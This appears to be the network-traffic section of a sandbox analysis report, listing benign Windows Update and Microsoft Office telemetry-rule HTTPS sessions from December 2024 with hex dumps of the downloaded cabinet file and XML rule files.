                      2024-12-03 16:51:35 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NyhtEpSE923+nrz&MD=EntUVEoZ HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
                      2024-12-03 16:51:36 UTC560INHTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                      MS-CorrelationId: 1285428e-6ecd-4da4-a3b3-d2f153f5ef69
                      MS-RequestId: 46274fd3-7a4d-427f-90f7-99be6160cc92
                      MS-CV: ffEwBvq1n0yfXxm4.0
                      X-Microsoft-SLSClientCache: 2880
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 03 Dec 2024 16:51:35 GMT
                      Connection: close
                      Content-Length: 24490
                      2024-12-03 16:51:36 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                      2024-12-03 16:51:36 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                      Session IDSource IPSource PortDestination IPDestination Port
                      27192.168.2.64974813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:37 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:38 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:38 GMT
                      Content-Type: text/xml
                      Content-Length: 464
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                      ETag: "0x8DC582B97FB6C3C"
                      x-ms-request-id: e1f54f45-601e-0097-18a1-42f33a000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165138Z-174f7845968ljs8phC1EWRe6en00000015y000000000ughp
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:38 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                      Session IDSource IPSource PortDestination IPDestination Port
                      28192.168.2.64974413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:37 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:38 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:38 GMT
                      Content-Type: text/xml
                      Content-Length: 469
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                      ETag: "0x8DC582BBA701121"
                      x-ms-request-id: 21fb2ca2-701e-006f-1cf2-44afc4000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165138Z-174f7845968glpgnhC1EWR7uec000000169g00000000qfuu
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:38 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      29192.168.2.64974713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:37 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:38 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:38 GMT
                      Content-Type: text/xml
                      Content-Length: 415
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                      ETag: "0x8DC582BA41997E3"
                      x-ms-request-id: 6ab56c84-d01e-008e-48c7-43387a000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165138Z-174f7845968qj8jrhC1EWRh41s000000163000000000r9f7
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:38 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                      Session IDSource IPSource PortDestination IPDestination Port
                      30192.168.2.64974613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:38 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:38 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:38 GMT
                      Content-Type: text/xml
                      Content-Length: 477
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                      ETag: "0x8DC582BB8CEAC16"
                      x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165138Z-174f7845968xr5c2hC1EWRd0hn0000000r0000000000n0wk
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:38 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      31192.168.2.64974913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:38 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:38 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:38 GMT
                      Content-Type: text/xml
                      Content-Length: 494
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                      ETag: "0x8DC582BB7010D66"
                      x-ms-request-id: ef6c78e4-401e-0067-2ec7-4309c2000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165138Z-174f78459685726chC1EWRsnbg000000166000000000qd9m
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:38 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      32192.168.2.64975013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:40 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:40 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:40 GMT
                      Content-Type: text/xml
                      Content-Length: 419
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                      ETag: "0x8DC582B9748630E"
                      x-ms-request-id: 7e299a61-c01e-0049-0c07-41ac27000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165140Z-174f7845968pght8hC1EWRyvxg00000009b000000000eeyu
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                      Session IDSource IPSource PortDestination IPDestination Port
                      33192.168.2.64975213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:40 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:40 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:40 GMT
                      Content-Type: text/xml
                      Content-Length: 404
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                      ETag: "0x8DC582B9E8EE0F3"
                      x-ms-request-id: 3f7caad5-701e-006f-6962-43afc4000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165140Z-174f7845968glpgnhC1EWR7uec00000016dg000000006183
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:40 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                      Session IDSource IPSource PortDestination IPDestination Port
                      34192.168.2.64975113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:40 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:40 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:40 GMT
                      Content-Type: text/xml
                      Content-Length: 472
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                      ETag: "0x8DC582B9DACDF62"
                      x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165140Z-174f7845968zgtf6hC1EWRqd8s0000000z3000000000q6wf
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      35192.168.2.64975313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:40 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:40 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:40 GMT
                      Content-Type: text/xml
                      Content-Length: 468
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                      ETag: "0x8DC582B9C8E04C8"
                      x-ms-request-id: 5181e575-b01e-001e-206f-430214000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165140Z-174f7845968cdxdrhC1EWRg0en000000161000000000xb6d
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:40 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      36192.168.2.64975413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:40 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:40 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:40 GMT
                      Content-Type: text/xml
                      Content-Length: 428
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                      ETag: "0x8DC582BAC4F34CA"
                      x-ms-request-id: bfd9c363-801e-0083-07ee-44f0ae000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165140Z-174f7845968cs2nkhC1EWR2tq000000001xg0000000096g3
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:40 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
